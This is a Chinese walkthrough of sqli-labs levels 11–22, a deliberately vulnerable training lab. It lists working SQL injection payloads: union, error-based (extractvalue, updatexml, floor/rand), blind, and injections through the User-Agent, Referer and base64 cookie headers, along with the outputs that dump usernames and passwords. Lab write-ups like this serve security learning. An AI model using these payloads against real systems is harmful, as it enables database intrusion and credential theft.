sqli-labs Basic Challenges Less11-22

总结:

Less11-12 Union select
Less13-14 报错注入
Less15-16 盲注
Less17 Update报错注入
Less18-20 抓包修改字段
Less21-22 抓包修改字段+Base64加密

详细:

Less-11 POST-Error Based-Single quotes-String
admin admin //猜想一个用户的名字和密码,成功
admin'-- - //成功
admin' union select 1,2-- - //成功,一共有2列
' union select 1,2-- -	//2列都可以显示
' union select 1,database()-- -	//得到数据库名security
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
//得到表名emails,referers,uagents,users
' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- -
//得到列名id,username,password
' union select 1,group_concat('id',' ',username,' ',password) from users-- -
//得到所有数据
Less-12 POST-Error Based-Double quotes-String-with twist
admin admin //success
admin'-- - //false
admin"-- - //false, SQL syntax错误
admin")-- -	//success
//中间省略
") union select 1,group_concat('id',' ',username,' ',password) from users-- -
//得到所有数据
Less-13 Double Injection-Single quotes-String-with twist
admin admin //success,但是没有正确的具体信息
admin'-- - //失败,有失败的具体信息
admin')-- - //success

报错注入方法1:

admin') and extractvalue('anything',concat('~',database()))-- - 
//返回错误信息XPATH syntax error: '~security'
admin') and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- - 
//返回错误信息XPATH syntax error: '~emails,referers,uagents,users'
admin') and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))-- -
//返回错误信息XPATH syntax error: '~id,username,password'
admin') and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -
//返回错误信息XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

报错注入方法2:

admin') and updatexml('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)),'anything')-- -

报错注入方法3:

') union select count(*),concat(database(),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'security0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'emails,referers,uagents,users0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'id,username,password0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(id,' ',username,' ',password) from users),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
Less-14 POST-Double Injection-Single quotes-String-with twist

虽然题目写的是Single quotes,但其实是Double quotes。

把上题中的')换成"即可。

Less-15 POST-Blind-Boolian/time Based-Single quotes

页面能够返回成功或失败,但是不能返回具体信息。

admin'-- -
admin' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1-- -
admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=1-- -
//这两种都可以

使用burp suite进行盲注,可以得到表的名称总长度为29。

admin' and (select substring(group_concat(table_name),1,1) from information_schema.tables where table_schema=database())='a'-- -

不断测试得到表名,之后得到列名和数据内容。

Less-16 类似
Less-17 POST-Update Query-Error Based-String

一上来是一个重设密码的界面。

update语句的结构是:update 表名 set 列名=值 where 列名=值

在这个题目中应该类似于update 表名 set password=值 where username=值

admin admin //成功
admin' admin //正常报错
admin" admin // 正常报错

做到这里我觉得很奇怪,于是去看了源码,发现源码中对username的输入,用mysqli_real_escape_string函数进行了处理,所以此处无法注入成功。

而且源码中是先确认username存在,再对其密码进行更新的。所以username这里必须填写一个已有的用户名。

admin admin' //成功,但是报错在'admin"附近的索引出现问题

因为可以看到报错,所以考虑利用报错注入。用户名始终输入admin,密码测试如下:

admin' and extractvalue('anything',concat('~',database()))-- -
//得到报错XPATH syntax error: '~security',接下来爆表
admin' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
//XPATH syntax error: '~emails,referers,uagents,users',接下来爆列
admin' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
//XPATH syntax error: '~id,username,password',接下来爆字段
admin' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -

但是得到报错:You can’t specify target table ‘users’ for update in FROM clause

大概意思是,在同一语句中,不能先select表中的一些内容,再update同一张表。

尝试加一层中间表:

admin' and extractvalue('anything',concat('~',(select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t)))-- -

成功得到:XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

下一步是接着读取被截断的字节:

admin' and extractvalue('anything',concat('~',substring((select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t),32,32)))-- -

然后把中间的32换成64,就可以接着读取了。

Less-18 POST-Header Injection-Uagent field-Error based

观察源码,发现username和password都被过滤,但是存在user agent和IP两个注入点:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

这里选择对uagent的值进行魔改~

设置好浏览器的代理,用burpsuite进行抓包,在User-Agent一栏中填写

' extractvalue('anything',concat('~',database())) and '

然后点击Forward:

sqli-labs Basic Challenges Less11-22_第1张图片

就可以看到浏览器的输出:

sqli-labs Basic Challenges Less11-22_第2张图片

接下来先爆表,再爆列,最后爆数据,语法和上一节类似:

' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users))) and '

可以成功得到前32字节的输出~

Less-19 POST-Header Injection-Referer field-Error based

和上一题类似,只不过本题是对Referer字段进行注入。

在burpsuite的Referer字段输入:

' and extractvalue('anything',concat('~',database())) and '

点击Forward后,成功得到报错:XPATH syntax error: '~security'

接下来分别爆表、爆列、爆数据:

1.爆表
' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
//得到XPATH syntax error: '~emails,referers,uagents,users'
2.爆列
' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '
//得到XPATH syntax error: '~id,username,password'
3.爆字段
' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//得到XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
//修改1为32、64等,得到后续字段
Less-20 POST-Cookie Injection-Uagent field-Error based

用burpsuite抓包,修改cookie字段。

uname=admin' and extractvalue('anything',concat('~',database())) and '

得到报错:

Issue with your mysql: XPATH syntax error: '~security'

和上一题步骤与语法都类似。

直接最后爆数据库字段:

uname=admin' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//得到报错Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Less-21 Cookie Injection-base64 encoded-single quotes and parenthesis

观察源码,可以看到cookie的值经过base64解密后进行查询,查询语句中有单引号和圆括号:

$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

所以构建新的cookie注入内容,将下面语句进行base64加密:

uname=admin')and extractvalue('anything',concat('~',database()))-- -

得到:

uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=

然后用burpsuite在Cookie处进行注入,得到报错:Issue with your mysql: XPATH syntax error: ‘~security’。

但是非常迷的一点是,如果在构造时,在admin')and之间加入空格,则会失败:

//加上空格后:
uname=admin') and extractvalue('anything',concat('~',database()))-- -
//base64编码:
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKCdhbnl0aGluZycsY29uY2F0KCd+JyxkYXRhYmFzZSgpKSktLSAt
//得到报错:
check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0,1' at line 1

不知道是Base64算法的实现有问题还是怎样。

接下来还是爆表,爆列,爆字段,这里只写一下爆字段的:

uname=admin')and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
//加密后
uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//成功得到报错Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Less-22 Cookie Injection-base64 encoded-double quotes

如果不考虑题目中给的提示,自己慢慢对cookie尝试注入:

1.admin' YWRtaW4n
//Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='
2.admin" YWRtaW4i
//check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" LIMIT 0,1' at line 1
//看来是双引号没错了
3.//尝试注掉后面的双引号
admin"-- - YWRtaW4iLS0gLQ==
//返回正常,说明注入成功
4.//用报错注入查看数据库
admin" and extractvalue('anything',concat('~',database()))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=
//成功得到报错Issue with your mysql: XPATH syntax error: '~security'
5.//查看所有的表名,select部分记得加括号
admin" and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSkpKS0tIC0=
//得到XPATH syntax error: '~emails,referers,uagents,users'
6.//查看所有的列名
admin" and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJykpKS0tIC0=
//得到 XPATH syntax error: '~id,username,password'
7.//查看前32位数据
admin" and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//成功得到报错XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

你可能感兴趣的:(CTF)